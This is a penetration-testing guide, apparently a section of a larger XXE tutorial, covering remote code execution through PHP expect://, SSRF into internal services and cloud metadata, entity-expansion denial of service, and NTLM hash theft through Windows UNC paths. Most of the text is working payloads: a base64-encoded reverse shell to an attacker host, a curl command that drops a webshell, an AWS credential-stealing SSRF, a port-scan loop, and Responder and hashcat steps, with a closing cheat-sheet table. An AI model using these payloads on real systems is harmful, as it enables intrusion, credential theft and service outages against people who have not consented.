RCE and SSRF

XXE isn’t only about file reads. Four additional primitives are available, depending on parser and target:

# 1. PHP expect:// for direct RCE (requires expect module loaded - uncommon)
<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'http://attacker/shell.php'">
# 2. SSRF - make the parser fetch internal URLs
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin">
<!ENTITY xxe SYSTEM "http://internal-service.local/api/secrets">
# 3. Billion laughs DoS (often blocked in modern parsers)
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;..."> (recursive expansion, 10^N total)
# 4. Windows UNC path → NTLM hash to attacker-controlled SMB
<!ENTITY xxe SYSTEM "\\attacker.example.com\share\anyfile">

Success indicator depends on path: shell on the target (RCE), internal service response leaked back via reflection or OOB (SSRF), target’s response slow/error/crash (DoS), or a Responder/SMB capture of the target’s NTLM hashes.

The expect:// wrapper is part of PHP’s pecl-expect extension. When loaded, it executes commands on the host:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root><name>&xxe;</name></root>

If expect is loaded, the response includes the output of id:

Thanks uid=33(www-data) gid=33(www-data) groups=33(www-data)

That’s immediate RCE.

PHP expect is not enabled by default on any modern PHP install. It’s a manually-installed PECL extension, and most distros don’t include it in their default packages. In a real engagement, expect-enabled targets are rare - when you find one, it’s usually a legacy app or a deliberately weakened lab environment.

Always test for it even though it’s rare - the cost is one extra payload and the payoff is full RCE in a single shot.

<!ENTITY xxe SYSTEM "expect://id">

If the response contains the output of id, expect is loaded. If it returns empty, an error, or “wrapper not supported,” it’s not. Either way, move on.
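The check described above can be automated with a small pattern match. This is a minimal sketch, assuming the response body is already available as a string; the function name and the regular expression are illustrative, not part of any tool:

```python
import re

# Matches the start of typical `id` output, e.g. "uid=33(www-data) gid=33(www-data)".
ID_OUTPUT = re.compile(r"uid=\d+\([^)]*\)\s+gid=\d+\([^)]*\)")


def looks_like_id_output(body: str) -> bool:
    """Return True if the response body contains text shaped like `id` output."""
    return ID_OUTPUT.search(body) is not None


if __name__ == "__main__":
    print(looks_like_id_output("Thanks uid=33(www-data) gid=33(www-data) groups=33(www-data)"))
    print(looks_like_id_output("wrapper not supported"))
```

Matching on the uid=/gid= shape rather than a fixed username keeps the check independent of which account the web server runs as.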

Two constraints on what you can pass to expect://:

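  1. XML reserved characters: <, >, &, and the quote character that delimits the entity’s system literal can break the XML (or trip upstream filters) if used in the command without entity-encoding. Avoid them. Single quotes are safe inside a double-quoted literal.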
  2. URL syntax: characters with URL-special meaning (?, #, &, spaces) get parsed weirdly. Spaces in particular usually break the wrapper.
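Both constraints can be checked before a command is placed in a payload. The sketch below is an assumption-laden helper, not a library API: the names risky_characters, XML_RISKY and URL_RISKY are hypothetical, and it assumes the system literal is double-quoted, so single quotes are not flagged.

```python
# Characters that can corrupt a double-quoted system literal (assumption: " is the delimiter).
XML_RISKY = set('<>&"')
# Characters with URL-special meaning, including the space.
URL_RISKY = set("?#& ")


def risky_characters(command: str) -> dict[str, list[str]]:
    """List which characters in a command fall under each of the two constraints."""
    return {
        "xml": sorted({c for c in command if c in XML_RISKY}),
        "url": sorted({c for c in command if c in URL_RISKY}),
    }


if __name__ == "__main__":
    print(risky_characters("id"))
    print(risky_characters("curl -O http://attacker:8000/shell.php"))
```

An empty result for both keys means the command can go into the entity as written; anything else needs one of the workarounds that follow.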

The standard workaround for spaces is $IFS (the shell’s Internal Field Separator, which defaults to space/tab/newline):

<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'http://attacker:8000/shell.php'">

Expands to: curl -O 'http://attacker:8000/shell.php'

For more complex commands, base64-encode and pipe to bash:

$ echo 'bash -c "/bin/bash -i >& /dev/tcp/attacker/4444 0>&1"' | base64
YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2F0dGFja2VyLzQ0NDQgMD4mMSIK

<!ENTITY xxe SYSTEM "expect://echo$IFS'YmFzaC...K'|base64$IFS-d|bash">

Pipes (|) often survive in expect:// URLs but test first - some parsers URL-decode and break on |.

The cleanest single-shot RCE-to-shell pattern:

# On attacker host
$ echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
$ python3 -m http.server 8000

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://curl$IFS-o$IFS/var/www/html/shell.php$IFS'http://attacker:8000/shell.php'">
]>
<root><name>&xxe;</name></root>

The target uses curl to download your shell.php into its own webroot. Now you have a persistent webshell:

$ curl 'http://target/shell.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Trade-off: dropping a file is louder than one-shot RCE - but persistent shell is worth the noise in most engagements.

When expect:// isn’t available, RCE through XXE alone usually isn’t possible. The pivots:

  • Use file disclosure to find credentials (see File disclosure) - DB passwords in config files, SSH keys, AWS keys
  • Use SSRF to reach internal services (next section) - internal admin panels, unauthenticated metadata services, internal API endpoints
  • Chain with another vulnerability - an upload, an SSTI in a different field, an admin-only function via IDOR

XXE without expect is “file read + SSRF + maybe DoS.” That’s still highly impactful.

External entity URIs aren’t limited to file://. The parser will resolve http:// and https:// URIs too, which makes XXE a vehicle for Server-Side Request Forgery - making the target’s parser fetch URLs from the target’s network perspective.

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8080/">
]>
<root><name>&xxe;</name></root>

If the target has an admin panel on localhost:8080 not exposed externally, this fetches its homepage. The HTML response gets reflected back through the <name> field.

For non-reflected variants, use the OOB pattern from Blind exfil - your listener receives the internal response.

Loop XXE payloads over a port range and observe response differences:

$ for port in 22 80 443 3306 5432 6379 8080 8443 9000 11211; do
    # --max-time caps each probe so a filtered port cannot stall the loop
    response=$(curl -s --max-time 45 -X POST http://target/api/submit \
      -H 'Content-Type: application/xml' \
      --data "<?xml version='1.0'?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'http://127.0.0.1:$port/'>]>
<root><name>&xxe;</name></root>")
    # printf avoids echo's handling of backslashes and leading dashes
    size=$(printf '%s' "$response" | wc -c)
    echo "Port $port: $size bytes"
  done

Patterns to look for:

| Response | Likely state |
| --- | --- |
| Reasonable HTML/JSON content | Port open, service responded |
| Empty / very small response | Port open but service didn’t respond as HTTP (e.g., SSH banner) |
| Connection refused error | Port closed |
| Timeout | Port filtered (firewall) |

Note that timing varies per parser. Some parsers wait 30+ seconds on connection timeouts - set per-request timeouts in your scanner accordingly.
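The response patterns can be encoded as a small decision function. This is a sketch under stated assumptions: classify_probe is a hypothetical name, the 64-byte cutoff for a "very small" response is arbitrary, and matching on the word "refused" assumes the application reflects the parser's error text, which varies per target.

```python
from typing import Optional


def classify_probe(body: str, error: Optional[str], timed_out: bool,
                   small_threshold: int = 64) -> str:
    """Map one probe result to the likely port state from the patterns above."""
    if timed_out:
        return "filtered"
    if error and "refused" in error.lower():
        return "closed"
    if len(body) <= small_threshold:
        return "open, non-HTTP or silent service"
    return "open, service responded"


if __name__ == "__main__":
    print(classify_probe("<html>" + "x" * 500, None, False))
    print(classify_probe("", "Connection refused", False))
    print(classify_probe("", None, True))
```

Checking the timeout first matters: a timed-out probe also has an empty body, so it would otherwise be misread as an open but silent port.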

The classic high-value internal target on cloud hosts:

| Cloud | Metadata URL |
| --- | --- |
| AWS | http://169.254.169.254/latest/meta-data/ |
| AWS (IMDSv2 - requires PUT) | Token-based; harder to use XXE for |
| GCP | http://metadata.google.internal/computeMetadata/v1/ (needs Metadata-Flavor: Google header) |
| Azure | http://169.254.169.254/metadata/instance (needs Metadata: true header) |
| Oracle Cloud | http://192.0.0.192/latest/ |

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

If the instance has an IAM role attached, this returns the role name. Follow up with:

<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/INSTANCE_ROLE">

Returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken). Use with aws-cli to operate as the instance’s IAM role.

GCP and Azure require headers, which XXE alone can’t add - XML entity URLs don’t carry headers. For metadata services that require headers, XXE can confirm reachability but not actually retrieve credentials.

Beyond cloud metadata, internal admin panels are common XXE-SSRF targets:

| Service | Default port | Sometimes accessible |
| --- | --- | --- |
| Jenkins | 8080 | http://127.0.0.1:8080/script (Groovy console - direct RCE) |
| Tomcat manager | 8080 | http://127.0.0.1:8080/manager/html |
| Elasticsearch | 9200 | http://127.0.0.1:9200/_cluster/health |
| MongoDB REST | 28017 | http://127.0.0.1:28017/ |
| Redis | 6379 | Not HTTP, but some Redis configs respond to HTTP-shaped queries |
| etcd | 2379 | http://127.0.0.1:2379/v2/keys/ |
| Consul | 8500 | http://127.0.0.1:8500/v1/agent/self |
| Kubernetes API | 6443 | https://127.0.0.1:6443/api/v1/namespaces (usually requires auth) |

Each is worth a probe - the value of finding one is high (often direct admin access on the internal service).

The protocols a parser supports vary:

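| Protocol | libxml2 (PHP) | Java SAX | .NET XmlReader |
| --- | --- | --- | --- |
| file:// | Yes | Yes | Yes |
| http://, https:// | Yes | Yes | Yes |
| ftp:// | Yes | Sometimes | No |
| gopher:// | No | Sometimes | No |
| expect:// | If module loaded | No | No |
| jar:// | No | Yes | No |
| netdoc:// | No | Yes | No |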

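Java’s jar protocol is particularly interesting - it fetches a JAR over HTTP and extracts a specific file from inside. The actual URL form wraps another URL and names the entry after "!/", as in jar:http://host/archive.jar!/path/inside. Sometimes useful for blind exfil because the response timing differs from a raw HTTP fetch.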

The historical denial-of-service payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY a0 "DOS">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root><name>&a10;</name></root>

a10 resolves to 10 copies of a9, each of which is 10 copies of a8, … down to a0 which is the literal "DOS". Total expansion: 10¹⁰ copies of a 3-character string = 3 × 10¹⁰ characters, roughly 30 GB of memory at one byte per character. The parser tries to materialize the string, runs out of memory, and crashes.
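The expansion size is easy to verify with arithmetic rather than by running the payload. A minimal sketch, assuming one byte per character; the function names are illustrative:

```python
def expanded_length(base: str, fanout: int, levels: int) -> int:
    """Length of the fully expanded top-level entity, computed without building it."""
    return len(base) * fanout ** levels


def materialize(base: str, fanout: int, levels: int) -> str:
    """Actually build the expansion. Only safe for small values of levels."""
    text = base
    for _ in range(levels):
        text = text * fanout
    return text


if __name__ == "__main__":
    # Sanity check on a small case: three levels of 10x nesting over "DOS".
    assert len(materialize("DOS", 10, 3)) == expanded_length("DOS", 10, 3)

    size = expanded_length("DOS", 10, 10)   # a10 in the payload above
    print(size)           # 30000000000
    print(size / 10**9)   # 30.0 (GB at one byte per character)
```

Each extra nesting level multiplies the result by 10, while adding only one short line to the payload.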

Every major XML parser shipped between 2012 and 2018 added protection:

  • libxml2 (PHP, Python lxml, others): enforces hard limits on entity expansion (10MB default since 2.9.0, lifted only when the caller sets XML_PARSE_HUGE)
  • Java: the jdk.xml.entityExpansionLimit system property; defaults to 64,000 expansions
  • .NET: XmlReaderSettings.MaxCharactersFromEntities defaults to disabled

Modern targets reject the payload outright with “entity expansion limit exceeded” or just refuse to expand past the budget. Try it once on every XXE-vulnerable target to check, but expect failure.

Quadratic blowup - the actually-still-works variant

A different DoS payload bypasses entity expansion limits by using a single entity many times:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY a "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...(10,000 chars)...aaa">
]>
<root>
&a;&a;&a;&a;&a;&a;&a;...(repeated 10,000 times)...&a;&a;&a;
</root>

This isn’t recursive - it’s just 10,000 references to a 10,000-char entity, producing 100MB output. Entity-expansion limits don’t catch it because there’s no recursion. Parsers with no output-size limit will materialize the full 100MB and slow down.
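The numbers can be checked the same way. The sketch below compares input size, output size and reference count for the payload above. It assumes the entity is named a (so each reference costs three characters) and ignores the few dozen bytes of XML scaffolding. The 64,000 figure is the Java default quoted earlier, and the function name is hypothetical.

```python
JAVA_DEFAULT_EXPANSION_LIMIT = 64_000  # count-based limit quoted earlier in the text


def quadratic_blowup(entity_len: int, references: int) -> dict:
    """Approximate input and output sizes for one entity referenced many times."""
    reference_len = len("&a;")
    input_size = entity_len + references * reference_len
    output_size = entity_len * references
    return {
        "input": input_size,
        "output": output_size,
        "amplification": output_size / input_size,
        "under_count_limit": references < JAVA_DEFAULT_EXPANSION_LIMIT,
    }


if __name__ == "__main__":
    result = quadratic_blowup(10_000, 10_000)
    print(result["input"])              # 40000
    print(result["output"])             # 100000000
    print(result["amplification"])      # 2500.0
    print(result["under_count_limit"])  # True
```

Roughly 40 KB of input becomes 100 MB of output while staying under a limit that only counts expansions, which is why a separate output-size limit is needed to stop it.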

Modern parsers added output-size limits to address this, but the protection is patchier than recursive-expansion protection. Worth trying on targets where billion-laughs fails.

When the target is a Windows host parsing XML with external entity support, UNC paths trigger SMB connections - and SMB connections leak NTLM hashes:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "\\attacker.example.com\share\anyfile.txt">
]>
<root><name>&xxe;</name></root>

The parser tries to open the file via SMB. To authenticate the SMB connection, Windows sends an NTLM challenge-response for the target service account (a Net-NTLMv2 hash derived from its password, not the stored NT hash itself) to the attacker-controlled SMB server.

On the attacker host:

$ sudo responder -I eth0

Responder listens for SMB authentication attempts and captures NTLMv2 hashes:

[SMB] NTLMv2-SSP Client : 10.10.10.42
[SMB] NTLMv2-SSP Username : CORP\webapp_svc
[SMB] NTLMv2-SSP Hash : webapp_svc::CORP:1122334455667788:...
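The captured hash line follows the user::domain:challenge:proof:blob layout that hashcat mode 5600 expects. Before cracking, it can help to confirm a line has that shape. A minimal sketch: the class and function names are hypothetical, and the sample value in the usage lines is a made-up placeholder, not a real capture.

```python
from typing import NamedTuple


class NetNTLMv2(NamedTuple):
    user: str
    domain: str
    server_challenge: str  # 8 bytes, hex-encoded
    nt_proof: str          # hex-encoded response proof
    blob: str              # hex-encoded remainder of the response


def parse_netntlmv2(line: str) -> NetNTLMv2:
    """Split a user::domain:challenge:proof:blob line into named fields."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("expected user::domain:challenge:proof:blob")
    user, _, domain, challenge, proof, blob = parts
    if len(challenge) != 16:
        raise ValueError("server challenge should be 16 hex characters")
    for field in (challenge, proof, blob):
        bytes.fromhex(field)  # raises ValueError if a field is not valid hex
    return NetNTLMv2(user, domain, challenge, proof, blob)


if __name__ == "__main__":
    # Placeholder values for illustration only.
    sample = "webapp_svc::CORP:1122334455667788:" + "AB" * 16 + ":" + "0101" + "00" * 12
    print(parse_netntlmv2(sample).user)
```

A line that fails this check was probably truncated when copied out of the capture log and will be rejected by the cracker as well.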

Crack offline with hashcat:

$ hashcat -m 5600 ntlmv2.txt rockyou.txt

If the service account uses a guessable password, you get plaintext credentials for a domain-joined account - direct path to lateral movement.

This works when:

  • The XML parser supports \\...\ UNC paths (some do, some don’t)
  • The target’s OS is Windows
  • The target can reach the attacker’s SMB port (445/TCP) outbound - many environments firewall this, but inside-out SMB is common in less-mature setups
  • The XML parser runs as a domain-joined account (workstation/local accounts also work but with less downstream value)

Outbound SMB from web servers is heavily monitored / firewalled in mature environments. In permissive networks (lab, internal apps, smaller orgs), this still works.

If outbound SMB is blocked but HTTP isn’t, some Windows components negotiate NTLM over HTTP for paths that look like web shares:

<!ENTITY xxe SYSTEM "http://attacker.example.com/share/anyfile">

If the parser uses Windows’s URL fetching APIs (which negotiate NTLM by default for non-Internet zones), it sends NTLM auth to your HTTP server. Capture with ntlmrelayx or a custom listener.

| Primitive | Payload |
| --- | --- |
| RCE via expect (id check) | <!ENTITY xxe SYSTEM "expect://id"> |
| RCE webshell drop | <!ENTITY xxe SYSTEM "expect://curl$IFS-o$IFS/var/www/html/s.php$IFS'http://A/s.php'"> |
| SSRF localhost | <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/"> |
| SSRF internal hostname | <!ENTITY xxe SYSTEM "http://internal-api.local/admin"> |
| SSRF AWS metadata | <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> |
| Port scan loop | bash for-loop over ports + XXE per port |
| Billion-laughs DoS | Nested <!ENTITY aN> referencing aN-1 10 times each |
| Quadratic blowup DoS | One large entity, referenced 10000+ times in body |
| Windows UNC NTLM theft | <!ENTITY xxe SYSTEM "\\attacker.com\share\file"> |
| Capture NTLM | sudo responder -I eth0 |
| $IFS for spaces in expect | expect://curl$IFS-O$IFS'URL' |
| Detect expect loaded | Send expect://id; if output appears, it’s loaded |
| Cloud metadata services | AWS: 169.254.169.254; GCP: metadata.google.internal; Azure: 169.254.169.254 |

For tool-driven automation across the various XXE primitives (blind exfil, file read, port scan), see Automation.